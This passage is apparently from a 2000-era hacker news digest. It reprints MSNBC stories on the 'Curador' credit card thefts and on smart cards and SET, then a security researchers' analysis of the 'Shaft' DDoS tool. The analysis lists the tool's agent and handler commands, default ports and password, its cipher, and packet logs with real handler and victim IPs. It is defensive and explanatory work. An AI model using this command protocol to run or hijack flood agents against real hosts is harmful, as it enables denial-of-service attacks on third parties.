Web site, which sells video games. He was fired on March
2 because of chronic absenteeism, he said.

‘HE KNEW HIS STUFF’
.He was very good at his job,. said the man. .Didn’t
turn up very often and his personal hygiene wasn’t too
good, but he knew his stuff.
.He worked developing my company’s e-commerce
site, which he claimed was going to be the most secure in
the business. What I didn’t realize was that I had one of the
world’s biggest credit card hackers looking after my
customers..
Meanwhile, a claim by Gray that a credit card
belonging to Microsoft founder Bill Gates was among the
credit cards he and his friend are accused of stealing was
determined to be false on Monday.

Gray told the Sunday Telegraph that he had sent information
on a number of the cards, including Gates’ card, to a U.S.
Web site registered to NBC. (NBC is a partner in MSNBC.com.)

But examination of one of the Web sites posted by
.Curador. showed an entry about William F. Gates. The
Microsoft founder’s name is William H. Gates. The credit
card number listed also had too few digits to be valid, and
both Microsoft’s address and Gates’ e-mail address were
incorrect.
Gray and his friend could face charges under Britain’s
Computer Misuse Act of 1990.
They also could eventually be extradited to face
charges in the United States, the FBI’s Vatis told
MSNBC.com on Friday.
.The primary consideration is what’s in the interest of
justice,. said Vatis. .... We have obviously been
investigating violations of U.S. federal criminal law..
The teens are alleged to have caused losses that Vatis
said could amount to more than $3 million, based on the
cost of canceling the 26,000 credit card accounts and
issuing new cards. And Vatis said that was .just one
measure of possible loss.. Other costs could arise from any
fraudulent use of the credit card numbers, as well as the
expense of repairing compromised Web sites, he said.


Live Map: Clynderwen


The arrests in Wales appear to represent the first major
international response to a rapidly growing field in computer
crime. Earlier this month, in response to an MSNBC.com
investigation of international online credit card theft,
spokesmen for the FBI and other organizations involved in
fighting cybercrime said they could not recall any past
prosecutions in such matters.
On Friday, Vatis said he could easily think of
.international hacking incidents. that have led to
prosecutions, but not in the context of online credit card
information.
Many such cases are under investigation, he said. Vatis
said the international hurdles to investigating Internet crime
were not as high as some people might think, contending
that the FBI was .building more and more bridges every
day. with law enforcement agencies in other countries.


-=-

MSNBC supplimentary;

March 24th

Can hackers kill credit cards?

Spate of e-commerce intrusions might mean a new form
of payment system will come sooner than expected
By Bob Sullivan
MSNBC

March 24 — He calls himself .The Saint of
E-commerce.. Two months ago, .Curador. started
posting his catalog of stolen credit card numbers
on his Web page. He stole database after database
from a variety of e-commerce sites, each time
updating his site, then gleefully mailing
notification to reporters. He topped 25,000 records
from 13 Web sites. Despite all that the financial
risk and all that violation of personal privacy, no
one could stop him. But now authorities in Wales
have arrested two 18-year-olds on charges related
to the Curador thefts.

AUTHORITIES, OF COURSE, had always removed
Curador’s Web site — at least a dozen times. No matter; he
used the many free, anonymous Web hosting services
available on the Internet. And as fast as his Web page is
taken down, .Curador. would put up another one.
The 18-year-old computer intruder, who also goes by the
nickname .mind gimp,. told MSNBC in a telephone interview
only that he was located somewhere in Europe.
He wasn’t using the credit cards for financial gain, he
said The self-proclaimed .Saint of E-commerce. said he
simply wanted to embarrass the victim Web sites into
employing better security. He promised to continue breaking
into e-commerce sites and posting stolen numbers .until I
don’t need to do it anymore or until I get arrested..
But until Thursday, as MSNBC’s Mike Brunker
reported earlier this month, there hadn’t been a single
reported arrest of a foreign credit card thief by U.S.
authorities.

Curador’s thefts are just another story in this year’s
litany of tales surrounding online theft of personal and
financial information. E-merchants are furiously fighting the
battle to keep down fraud costs, and consumer confidence
in Internet safety is continually shaken, with no apparent end
in sight. So some experts think Curador may just be another
nail in the coffin of a credit card system that was hardly
designed for Internet purchasing.
.Anyone who’s serious about this is getting a lesson.
The wake-up call is here. The time is now,. said Stephen
Orfei, vice president of electronic commerce and emerging
technology for MasterCard International. Orfei is also the
spokesperson for SETCo, the Visa- and
MasterCard-backed organization pushing SET, a new
payments protocol designed to limit electronic fraud.

‘HOW CAN WE DO MORE?’
The raging success of online thieves, some say, will
force the hand of banks, merchants, credit card companies
and consumers to change the way we spend money much
sooner than we intended.
The high-profile hacks have at least gotten the attention
of merchants, said Alyxia Do, electronic payment and smart
card analyst with Frost & Sullivan.

.It seems that there
have been a greater
number of queries coming
in,. she said. .It began
with the CD Universe
break-in and it has just
continued to be in the
news. I have heard more
and more merchants are
going back to Visa and
MasterCard and asking,
‘How can we do more?’ .
The stakes are higher
for merchants than
consumers. While consumers face a limited liability of $50
and a paperwork hassle, online merchants must write off
credit card theft as .acceptable loss.. Hard data on how
bad losses are is impossible to find, but anecdotally some
industries relate fraud rates as high as 40 percent.
Merchants use inexact software to filter out potential
fraudulent purchases, but that means they turn away
legitimate sales, too.
The mathematics are alarming. In fact, according to Joe
Barrett, chairman of the Internet Fraud prevention Advisory
Council, in some industries, merchants are turning away 20
percent of proposed sales.
.You’re killing your business. You’d be better off
taking every sale and self-insuring,. he said.

SMART CARDS, FINALLY?
"A number and a date and you can buy anything you
want with it.. That’s how a teen-aged Internet credit card
thief described to MSNBC the fundamental problem of
using credit cards online.

The familiar plastic currency was designed to be
physically handed to merchants, who could at least make a
cursory check to see if signatures on the card and the sales
slip matched. Online, commerce is anonymous. There is no
way to see who’s entering the credit card numbers into the
Web page, an anonymity that heavily favors the fraud
artists.
Several technologies hope to tip the scales against
thieves by implementing systems that require some
real-world physical component when shopping online.
Smart cards, the generic term for any plastic which includes
an embedded microchip, are one promising solution.
Smart cards, which identify the user through encrypted
information embedded on the chip, must be inserted into a
.card reader. attached to the computer. That means the
card can’t be used for e-commerce unless the purchaser is
currently holding it.
A PIN number is also required, so a thief needs to
physically have the card and a security code in order to use
it. That’s not an insurmountable hurdle, but a far more
difficult one than using .a number and a date..
Still, smart cards are 20 years old, and while there have
been smatterings of adoption in Europe, trials of the
technology in the U.S. have failed repeatedly. Consumers
perceived them as inconvenient, and in the past they have
been unmoved by the improvement in security.


.In those trials, people still needed to carry around
spare change anyway,. said Don Davis, editor of Card
Technology Magazine. .They didn’t really solve a problem
for people. Now with the Internet, that changes things.
There is a real problem to be solved with smart cards..
And there appears to finally be momentum behind the
chip-enabled cards. Microsoft and Sun are currently battling
over the operating system used to run the cards, and
Windows 2000 includes native support for the technology.
But perhaps the biggest leap forward came last year, when
American Express announced .Blue,. the first widely
distributed smart card in the United States. Blue is a hybrid;
it still has the old-fashioned magnetic strip and can be used
as a traditional credit card. But the embedded chip can be
used for online purchases, and it also can be updated with
new software.
Part of the fresh promise for smart cards comes from
the changing economics in the industry. Card readers, which
must be connected to every PC if smart cards are to be
used, are now cheap enough to be given away. That’s
exactly what American Express decided to do when it
launched .Blue. last year.
.We see a lot of promise to the technology. There is a
real customer need out there,. said Molly Fause, American
Express spokesperson.

BABY STEPS
Still, .Blue. is just a toe in the water. Currently, the
chip only adds convenience — it lets cardholders open a
.digital wallet,. including billing information, with a single
swipe. But it is not used by merchants to positively identify
consumers; instead, the old-fashioned number is used, and it
can be stolen and exploited just like traditional cards.

And that’s been the problem for smart cards all along
— while European governments and institutions have
aggressively supported the technology (for example,
Germany has distributed 80 million cards to all users in its
health care system), U.S. companies have taken baby steps.
Davis points out that U.S. adoption is still likely to be
among the slowest in the world. With aggressive initiatives in
France and Germany already, he said most of Europe will
have converted to smart cards by 2005, with major Latin
American countries following soon after.
Still, the American Express initiative, while tepid, is
important. The company wouldn’t say how many Blue
cards have been issued; Faust would only say the company
has received twice as many applications as anticipated.
Analyst Do said she experts 1.5 million Blue cards to be in
consumers’ hands by year’s end.
.Believe me, the rest of the issuers in the U.S. are
closely following what American Express is doing,. he said.
The real goal, he said, is to ply consumers with coupons and
loyalty points they can download onto smart cards, which
will make them an attractive proposition. .If American
Express figures that out, the rest of the industry will react
quickly..
Still, getting Internet users to add hardware to their
existing systems is a tremendous challenge. Davis speculates
that many Blue owners don’t bother to hook up the card
reader, for example. And Do goes farther, suggesting that
the need to add a card reader makes smart cards a
non-starter in the consumer space.

But others say the
shift will be swift, once
consumers are convinced
about the benefits of
smart cards.
.The last paradigm
shift I would liken this to
is the mouse,. said Rick McNeef, vice president of
corporate development at Cybersafe Inc. .How long did it
take us to get a mouse in conjunction with every
keyboard?. He also thinks credit cards have built-in
obsolescence, since they all have an expiration date, and
most of our renewal cards will have chips inside. .Whatever
you have in your wallet right now, the expiration date is
three years or less. There’s an automatic replacement
anyway..

SET MAKES A COMEBACK
Additional hardware isn’t the only available method for
proving someone is who they say they are on the Internet.
The SET (secure electronic transactions) protocol
accomplishes that goal through software. In SET, each
customer receives a unique digital certificate, the
cyberworld equivalent of a real-life signature. The certificate
is .wrapped. around each transaction, and unwrapped by
banks at the other end — no more anonymous commerce.

.It transposes the physical world model into
cyberspace,. said Orfie, speaking on behalf of SETCo.
With each transaction, the consumer and the merchant must
prove they are who they say they are, using the special SET
digital authentication. That gives the bank an .irrefutable
audit trail,. meaning criminals could be traced. More
important, it satisfies the bank’s requirement for a signature
on each transaction, meaning merchants won’t receive those
fraud chargebacks that are currently a part of doing
business online.
But SET, like smart cards, has been slow to get off the
ground. First tested in 1996, the standard appeared to be
dead in the water last year. The SETCo.org Web site lists
only about 25 participating merchants. The extra decryption
processes proved slow and cumbersome; standards
weren’t set, and big e-commerce companies went with the
now-familiar .SLL. instead.
The fear when e-commerce was first introduced was
that ingenious card thieves would listen in on data being
slung around the Internet and pick off credit card
information as it went by, much like a wire tap. So, much
attention was given to Secure Socket Layer, or SSL,
technology, which encrypts the information while it’s in
transit. But SSL says nothing about who’s at either end of
the transaction. And unfortunately, cyber-eavesdropping
has turned out to be a non-issue. The problems begin when
the card number arrives at the merchant, who decrypts it.
But the recent surge of high-profile credit card thefts,
SET and its authentication capabilities are getting a new life,
some say.
.

MSNBC research


.We’ve anticipated this problem, which is now rearing
its ugly little head,. Orfie said. .We’re saying we have a
solution..
Since SET requires a much less costly infrastructure
upgrade, it may be the biggest benefactor from the slew of
hack attacks, Analyst Do said.
.It’s getting up and dusting itself off and starting to walk
again,. she said. .Online hacking will definitely promote
some kind of network security rather than smart cards..

STORES AREN’T BANKS
With either a hardware or a software solution, most
experts say that one fundamental change to the current
payments system is required. Today, merchants are forced
to act like banks. They are acquiring and storing personal
financial records — namely, credit cards.
SET and any of the various smart card proposals can
take this banking role away from retailers. In these new
systems, consumers who hit .submit. on a Web site can
send their purchase request to their own bank. Their bank
then gives the money to the e-commerce store, along with
some kind of unique identifying information. But personal
bank account numbers, or credit card numbers, are never
sent to the Web site.
.The best place for the card to be is to remain in the
banking system,. said Gerry Gay, vice president of sales
and marketing at SafeTpay.com, Inc. His company recently
launched a numeric keypad/card reader that acts like a
mini-ATM when attached to a personal computer. The card
reader immediately encrypts PIN numbers and card
numbers and sends the data directly to banks. Merchants
only receive their money and a tracking number.
.You eliminate another arena where the data can be
compromised,. Gay said. .As things are, you’re entrusting
your card data to someone who’s outside the payment
system..

OLD-FASHIONED BARN RAISING
Still, even with the increased impetus supplied by
cybercrooks, smart cards or any other payment solution
won’t take over overnight. Old habits — at banks,
merchants, and among consumers — die hard. Even if those
old habits are costly.
.The devil you know is better than the devil you don’t
know,. Gay said, describing his company’s challenge in
convincing banks and merchants to support his system.
But no fright over fraud can overcome the challenges of
an upgrade — in the case of smart cards, Analyst Do thinks
a complete overhaul of the system will require $15 billion.
Combine that with the fundamental change either SET or
smart cards would hoist on consumers, and you have some
formidable obstacles.
That makes Barrett, of the Internet Fraud Prevention
Advisory Council, leery.
.A lot of these things create issues for consumers.
They’re moving the pain onto consumers and taking it away
from merchants, and that’s not going to work,. said Barrett,
also an executive at Vitessa Corp., an online payment
company.
That’s why he thinks a very low-tech solution is needed
to deal with credit card crooks. If Barrett had his way,
companies like Amazon.com would open up their internal
fraud databases to all e-merchants. Such an open policy
would quickly create a list of suspicious e-mail addresses,
Internet Service providers, and of course, credit card
numbers.
.I try to encourage people to think about fraud
detection as a public good,. he said. The proposal has so
far fallen on deaf ears, as most merchants see their fraud
data as top-secret proprietary information. .Merchants on
the Internet have tendency to want to wall off and control
and not share their kownledge or incidents of fraud.
.Amazon doesn’t compete as a fraud detection
company. In so doing what they’re doing is hoarding
information … If you live in a dangerous neighborhood, are
you safe if you buy weapons? No. You still haven’t cleaned
up the neighborhood. If the top 100 merchants on the Net
put in place a technology that they could demonstrate
immediately it’s hard for hackers, that would clean up the
neighborhood..
His proposal is not so far, surprisingly, from the
community-based solution proposed by the Saint of
E-Commerce.
.There should be an Internet Bureau of Commerce that
can list every single person on the Internet who accepts
credit cards and people should be invited to try to break
in,. Curador said. .And if you can, then they are listed as
unsafe..
Such lists already exist — but they are shared only
among members of the Internet underground, and like
Curador’s notorious Web page, come and go under cover
of Internet anonymity. That means, for now, the bad guys
appear to be much better at sharing information than the
good guys. And while next-generation payment systems
continue to languish in trials, criminals continue to order
anything they want .with a number and a date..




@HWA

111.0 PSS: Shaft Distributed DoS tool analysis Sven Dietrich
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Packetstorm Security http://packetstorm.securify.com/


UNFORMATTED = AS IS, WARNING C=SOURCE INCLUDED - Ed


================================================================================

An analysis of the ``Shaft'' distributed denial of service tool

================================================================================

Sven Dietrich
NASA Goddard Space Flight Center
<spock@sled.gsfc.nasa.gov>

Neil Long
Oxford University
<neil.long@computing-services.oxford.ac.uk>

David Dittrich
University of Washington
<dittrich@cac.washington.edu>

Copyright 2000. All rights reserved.
March 13, 2000

-- 1. Introduction
------------------

This is an analysis of the "Shaft" distributed denial of service
(DDoS) tool. Denial of service is a technique to deny access to a
resource by overloading it, such as packet flooding in the network
context. Denial of service tools have existed for a while, whereas
distributed variants are relatively recent. The distributed nature
adds the "many to one" relationship. Throughout this analysis, most
actual host names have been modified or removed.

-- 2. Historical overview
-------------------------

"Shaft" belongs in the family of tools discussed earlier, such as
Trinoo, TFN, Stacheldraht, and TFN2K. Like in those tools, there are
handler (or master) and agent programs. The general concepts of these
tools can be found in a Distributed Intruder Tools Workshop Report held
in November 1999 at the Computer Emergency Response Team Coordination
Center (CERT/CC) in Pittsburgh, Pennsylvania:

http://www.cert.org/reports/dsit_workshop.pdf

In chronological order, there are Trinoo, TFN, Stacheldraht, Shaft, and
TFN2K. Trinoo, TFN, and Stacheldraht were analyzed in [5], [6], and [7]
respectively. TFN2K was recently analyzed in [1].

In the first two months of 2000, DDoS attacks against major Internet
sites (such as CNN, ZDNet, Amazon etc.) have brought these tools
further into the limelight. There are a few papers covering DDoS to
be found at:

http://packetstorm.securify.com/distributed/
http://staff.washington.edu/dittrich/misc/ddos/
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html


-- 3. Analysis
--------------

Shaftnode was recovered, initially in binary form, in late November
1999, then in source form for the agent. Distinctive features are
the ability to switch handler servers and handler ports on the fly,
making detection by intrusion detection tools difficult from that
perspective, a "ticket" mechanism to link transactions, and the
particular interest in packet statistics.

-- 3.1 The network: client(s)-->handler(s)-->agent(s)-->victim(s)
-----------------------------------------------------------------

The "Shaft" network is made up of one or more handler programs
("shaftmaster") and a large set of agents ("shaftnode"). The attacker
uses a telnet program ("client") to connect to and communicate with the
handlers. A "Shaft" network would look like this:

+--------+ +--------+
| client | | client |
+--------+ +--------+
| |
. . . --+------+---------------+------+----------------+-- . . .
| | |
| | |
+-----------+ +-----------+ +-----------+
| handler | | handler | | handler |
+-----------+ +-----------+ +-----------+
| | |
| | |
. . . ---+------+-----+------------+---+--------+------------+-+-- . . .
| | | | |
| | | | |
+-------+ +-------+ +-------+ +-------+ +-------+
| agent | | agent | | agent | | agent | | agent |
+-------+ +-------+ +-------+ +-------+ +-------+



-- 3.2 Network Communication
----------------------------

Client to handler(s): 20432/tcp
Handler to agent(s): 18753/udp
Agent to handler(s): 20433/udp

"Shaft" (in the analyzed version, 1.72) is modeled after Trinoo, in that
communication between handlers and agents is achieved using the
unreliable IP protocol UDP. See Stevens [18] for an extensive discussion of
the TCP and UDP protocols. Remote control is via a simple telnet connection
to the handler. "Shaft" uses "tickets" for keeping track of its individual
agents. Both passwords and ticket numbers have to match for the agent to
execute the request. A simple letter-shifting (Caesar cipher, see Schneier
[17]) is in use.

-- 3.3 Commands
---------------

The command structure is divided into the agent and handler command
syntax groups. The attacker interacts with the handler via a command
line.

-- 3.3.1 Agent Command Syntax

Accepted by agent and replies generated back to the handler:

size <size>
Size of the flood packets.

Generates a "size" reply.

type <0|1|2|3>
Type of DoS to run
0 UDP, 1 TCP, 2 UDP/TCP/ICMP, 3 ICMP

Generates a "type" reply.

time <length>
Length of DoS in seconds

Generates a "time" reply.

own <victim>
Add victim to list of hosts to perform denial of service on

Generates a "owning" reply.

end <victim>
Removes victim from list of hosts (see "own" above)

Generates a "done" reply.

stat
Requests packet statistics from agent

Generates a "pktstat" reply.

alive
Are you alive?

Generates a "alive blah" reply.

switch <handler> <port>
Switch the agent to a new handler and handler port

Generates a "switching" reply.

pktres <host>
Request packet results for that host at the end of the flood

Generates a "pktres" reply.


Sent by agent:

new <password>

Reporting for duty

pktres <password> <sock> <ticket> <packets sent>

Packets sents to the host identified by <ticket> number


-- 3.3.2 Handler (shaftmaster) Command Syntax

Little is known about the handler, but this is a speculation, pieced
together from clues, of how its command structure could look like:

mdos <host list>
Start a distributed denial of service attack (mdos = massive
denial of service?) directed at <host list>.

Sends out "own host" messages to all agents.

edos <host list>
End the above attack on <host list>.

Sends out "end host" messages to all agents.

time <length>
Set the duration of the attack.

Sends out "time <length>" to all agents.

size <packetsize>
Set the packetsize for the attack (8K maximum as seen in
source).

Sends out "size <packetsize>" to all agents.

type <UDP|TCP|ICMP|BOTH>
Set the type of attack, UDP packet flooding, TCP SYN
packet flooding, ICMP packet flooding, or all three (here
BOTH = ICMP amd IP protocols)

Sends "type <type>" to all agents.

+node <host list>
Add new agents

-node <host list>
Remove agents from pool

ns <host list>
Perform a DNS lookup on <host list>

lnod
List all agents

ltic
List all tickets (transactions?)

pkstat
Show total packet statistics for agents

Sends out "stat" request to all agents.

alive
Send an "alive" to all agents.

A possible argument to alive is "hi"

stat
show status?

switch
become the handler for agents

Send "switch" to all agents.

ver
show version

exit


-- 3.4 Password protection
--------------------------

After connecting to the handler using the telnet client, the attacker
is prompted with "login:". Too little is known about the handler or
its encryption method for logging in. A cleartext connection to the handler
port is obviously a weakness.

-- 3.5 Detection
----------------

-- 3.5.1 Binaries and their behavior

As with previous DDoS tools, the methods used to install the handler/agent
will be the same as installing any program on a compromised Unix system,
with all the standard options for concealing the programs and files (e.g.,
use of hidden directories, "root kits", kernel modules, etc.) The
reader is referred to Dittrich's Trinoo analysis [5] for a description of
possible installation methods of this type of tool.

Precautions have been taken to hide the default handler in the binary code.
In the analyzed code, the default handler is defined as follows:

#define MASTER "23:/33/75/28"

which would translate into 129.22.64.17 (electrochem1.echem.cwru.edu)
using the same simple cipher mentioned above. Port numbers are munged
before actual use, e.g.

#define MASTER_PORT 20483

is really port 20433.

All these techniques intend to hide the critical information from prying
eyes performing forensics on the code. The program itself tries to hide
itself as a legitimate Unix process (httpd in the default configuration).

Looking at strings in the shaftnode application reveals the following:

> strings -n 3 shaftnode
pktres
switch
alive
stat
end
own
time
type
size
httpd
23:/33/75/28
Unable to fork. (do it manually)
shift
new %s
size %s %s %s %s
type %s %s %s %s
time %s %s %s %s
owning %s %s %s %s
switched %s %s %s
done %s %s %s %s
pktstat %s %s %s %lu
alive %s %s %s blah
%d.%d.%d.%d
Error sending tcp packet from %s:%i to %lu:%i
pktres %s %i %i %lu


Upon launch, the "Shaft" agent (the "shaftnode") reports back to its
default handler (its "shaftmaster") by sending a "new <upshifted
password>" command. For the default password of "shift" found in the
analyzed code, this would be "tijgu". Therefore a new agent would send
out "new tijgu", and all subsequent messages would carry that password in
it. Only in one case does the agent shift in the opposite direction for
one particular command, e.g. "pktres rghes". It is unclear at the moment
whether this is intentional or not.

Incoming commands arrive in the format:

"command <upshifted password> <command arg> <socket> <ticket> <optional args>"

For most commands, the password and socket/ticket need to have the right magic
in order to generate a reply and the command to be executed.

Message flow diagram between handler H and agent A:

Initial phase: A -> H: "new", f(password)
Running loop: H -> A: cmd, f(password), [args], Na, Nb
A -> H: cmdrep, f(password), Na, Nb, [args]

- f(X) is the Caesar cipher function on X
- Na, Nb are numbers (tickets, socket numbers)
- cmd, cmdrep are commands and command acknowledgments
- args are command arguments

The flooding occurs in bursts of 100 packets per host, with the source
port and source address randomized. This number is hard-coded, but it is
believed that more flexibility can be added. Whereas the source port
spoofing only works if the agent is running as a root privileged process,
the author has added provisions for packet flooding using the UDP protocol
and with the correct source address in the case the process is running as a
simple user process. It is noteworthy that the random function is not
properly seeded, which may lead to predictable source port sequences and
source host IP sequences.

Source port = (rand() % (65535-1024)+1024) where % is the
mathematical 'mod' operator

This will generate source ports greater than 1024 at all times.

Source IP = rand()%255.rand()%255.rand()%255.rand()%255

The source IP numbers can (and will) contain a zero in the leading
octet.

Additionally, the sequence number for all TCP packets is fixed, namely
0x28374839, which helps with respect to detection at the network level.
The ACK and URGENT flags are randomly set, except on some platforms.
Destination ports for TCP and UDP packet floods are randomized.

The client must choose the duration ("time"), size of packets, and type
of packet flooding directed at the victim hosts. Each set of hosts has its
own duration, which gets divided evenly across all hosts. This is unlike TFN
[2] which forks an individual process for each victim host. For the type,
the client can select UDP, TCP SYN, ICMP packet flooding, or the combination
of all three. Even though there is potential of having a different type and
packet size for each set of victim hosts, this feature is not exploited
in this version.

The author of "Shaft" seems to have a particular interest in statistics,
namely packet generation rates of its individual agents. The statistics on
packet generation rates are possibly used to determine the "yield" of the
DDoS network as a whole. This would allow the attacker to stop adding hosts
to the attack network when it reached the necessary size to overwhelm the
victim network, and to know when it is necessary to add more agents to
compensate for loss of agents due to attrition during an attack (as the
agent systems are identified and taken off-line.)

Currently, the ability to switch host IP and port for the handler exists,
but the listening port for the agent remains the same. It is foreseeable
that this will change in the future.

-- 3.5.2 A sample attack

In this section we will look at a practical example of an attack carried
out with the "Shaft" distributed denial of service attack tool, as seen
from the attacking network perspective.

The shaftnode agent when in use, as seen by "lsof" [10]:

# lsof -c shaftnode
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
shaftnode 13489 root cwd VDIR 0,0 400 2 /tmp
shaftnode 13489 root txt VREG 0,0 19492 10 /tmp (swap)
shaftnode 13489 root txt VREG 32,0 662764 182321 /usr/lib/libc.so.1
shaftnode 13489 root txt VREG 32,0 17480 210757 /usr/platform/sun4u/lib/libc_psr.so.1
shaftnode 13489 root txt VREG 32,0 566700 182335 /usr/lib/libnsl.so.1
shaftnode 13489 root txt VREG 32,0 39932 182348 /usr/lib/libw.so.1
shaftnode 13489 root txt VREG 32,0 15720 182334 /usr/lib/libmp.so.1
shaftnode 13489 root txt VREG 32,0 15720 182327 /usr/lib/libintl.so.1
shaftnode 13489 root txt VREG 32,0 68780 182342 /usr/lib/libsocket.so.1
shaftnode 13489 root txt VREG 32,0 2564 182324 /usr/lib/libdl.so.1
shaftnode 13489 root txt VREG 32,0 137160 182315 /usr/lib/ld.so.1
shaftnode 13489 root 0u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
shaftnode 13489 root 1u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
shaftnode 13489 root 2u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
shaftnode 13489 root 3u inet 0x5032c7d8 0t0 UDP *:18753 (Idle)

As one can see, the agent is waiting to receive commands on its default
UDP port number 18753. The TCP connection back to the handler remains
unexplained to date.

Packet flows:

Date Time Protocol Source IP/Port Flow Destination IP/Port

Sun 11/28 21:39:22 tcp 129.22.64.17.53982 <-> x.x.x.x.21
Sun 11/28 21:39:56 udp x.x.x.x.33198 -> 129.22.64.17.20433
Sun 11/28 21:45:20 udp 129.22.64.17.1765 -> x.x.x.x.18753
Sun 11/28 21:45:20 udp x.x.x.x.33199 -> 129.22.64.17.20433
Sun 11/28 21:45:59 udp 129.22.64.17.1866 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp x.x.x.x.33200 -> 129.22.64.17.20433
Sun 11/28 21:45:59 udp 129.22.64.17.1968 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp 129.22.64.17.1046 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp 129.22.64.17.1147 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp 129.22.64.17.1248 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp 129.22.64.17.1451 -> x.x.x.x.18753
Sun 11/28 21:46:00 udp x.x.x.x.33201 -> 129.22.64.17.20433
Sun 11/28 21:46:00 udp x.x.x.x.33202 -> 129.22.64.17.20433
Sun 11/28 21:46:01 udp x.x.x.x.33203 -> 129.22.64.17.20433
Sun 11/28 21:48:37 udp 129.22.64.17.1037 -> x.x.x.x.18753
Sun 11/28 21:48:37 udp 129.22.64.17.1239 -> x.x.x.x.18753
Sun 11/28 21:48:37 udp 129.22.64.17.1340 -> x.x.x.x.18753
Sun 11/28 21:48:37 udp 129.22.64.17.1442 -> x.x.x.x.18753
Sun 11/28 21:48:38 udp x.x.x.x.33204 -> 129.22.64.17.20433
Sun 11/28 21:48:38 udp x.x.x.x.33205 -> 129.22.64.17.20433
Sun 11/28 21:48:38 udp x.x.x.x.33206 -> 129.22.64.17.20433
Sun 11/28 21:48:56 udp 129.22.64.17.1644 -> x.x.x.x.18753
Sun 11/28 21:48:56 udp x.x.x.x.33207 -> 129.22.64.17.20433
Sun 11/28 21:49:59 udp x.x.x.x.33208 -> 129.22.64.17.20433
Sun 11/28 21:50:00 udp x.x.x.x.33209 -> 129.22.64.17.20433
Sun 11/28 21:50:14 udp 129.22.64.17.1747 -> x.x.x.x.18753
Sun 11/28 21:50:14 udp x.x.x.x.33210 -> 129.22.64.17.20433

There is quite some activity between the handler and the agent, as they
go through the command request and acknowledgement phases. There
was also what appeared to be testing of the impact on the local
network itself with ICMP packet flooding, for which we omit the data
here due to size limitations.

Let us look at the individual phases from a later attack.

Setup and configuration phase:

date time src dest dest-port command

4 Dec 1999 18:06:40 129.22.64.17 x.x.x.x 18753 alive tijgu hi 5 8170
4 Dec 1999 18:09:14 129.22.64.17 x.x.x.x 18753 time tijgu 700 5 6437
4 Dec 1999 18:09:14 x.x.x.x 129.22.64.17 20433 time tijgu 5 6437 700
4 Dec 1999 18:09:16 129.22.64.17 x.x.x.x 18753 size tijgu 4096 5 8717
4 Dec 1999 18:09:16 x.x.x.x 129.22.64.17 20433 size tijgu 5 8717 4096
4 Dec 1999 18:09:23 129.22.64.17 x.x.x.x 18753 type tijgu 2 5 9003

The handler issues an "alive" command, and says "hi" to its agent,
assigning a socket number of "5" and a ticket number of 8170. We will see
that this "socket number" will persist throughout this attack. A time
period of 700 seconds is assigned to the agent, which is acknowledged. A
packet size of 4096 bytes is specified, which is again confirmed. The
last line indicates the type of attack, in this case "the works", i.e.
UDP, TCP SYN and ICMP packet flooding combined. Failure to specify the type
would make the agent default to UDP packet flooding.

Now the list of hosts to attack and which ones they want statistics from
on completion:

date time src dest dest-port command

4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 207.229.143.6 5 5256
4 Dec 1999 18:09:24 x.x.x.x 129.22.64.17 20433 owning tijgu 5 5256 207.229.143.6
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 pktres tijgu 207.229.143.6 5 1993
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 24.7.231.128 5 78
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 pktres tijgu 24.218.58.101 5 8845
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 18.85.13.107 5 6247
4 Dec 1999 18:09:25 129.22.64.17 x.x.x.x 18753 own tijgu 24.218.52.44 5 4190
4 Dec 1999 18:09:25 129.22.64.17 x.x.x.x 18753 own tijgu 207.175.72.15 5 2376
4 Dec 1999 18:09:25 x.x.x.x 129.22.64.17 20433 owning tijgu 5 78 24.7.231.128
4 Dec 1999 18:09:26 x.x.x.x 129.22.64.17 20433 owning tijgu 5 6247 18.85.13.107
4 Dec 1999 18:09:27 x.x.x.x 129.22.64.17 20433 owning tijgu 5 4190 24.218.52.44
4 Dec 1999 18:09:28 x.x.x.x 129.22.64.17 20433 owning tijgu 5 2376 207.175.72.15
4 Dec 1999 18:21:04 x.x.x.x 129.22.64.17 20433 pktres rghes 5 1993 51600
4 Dec 1999 18:21:04 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400
4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51500
4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400
4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400

Now that all other parameters are set, the handler issues several "own"
commands, in effect specifying the victim hosts. Those commands are
acknowledged by the agent with an "owning" reply. The flooding occurs as
soon as the first victim host gets added. The handler also requests
packet statistics from the agents for certain victim hosts (e.g. "pktres
tijgu 207.229.143.6 5 1993"). Note that the reply comes back with the
same identifiers ("5 1993") at the end of the 700 second packet flood,
indicating that 51600 sets of packets were sent. One should realize that,
if successful, this means 51600 x 3 packets due to the configuration of
all three (UDP

  
, TCP, and ICMP) types of packets. In turn, this results
in roughly 220 4096 byte packets per second per host, or about 900
kilobytes per second per victim host from this agent alone, about 4.5
megabytes per second total for this little exercise.

Note the reverse shift ("shift" becomes "rghes", rather than "tijgu") for
the password on the packet statistics.


-- 3.5.3 Detection at the network level

Scanning the network for open port 20432 will reveal the presence of a
handler on your LAN.

For detecting idle agents, one could write a program similar to George
Weaver's trinoo detector. Sending out "alive" messages with the default
password to all nodes on a network on the default UDP port 18753 will
generate traffic back to the detector, making the agent believe the
detector is a handler.

This program does not provide for code updates (like TFN or Stacheldraht).
This may imply "rcp" or "ftp" connections during the initial
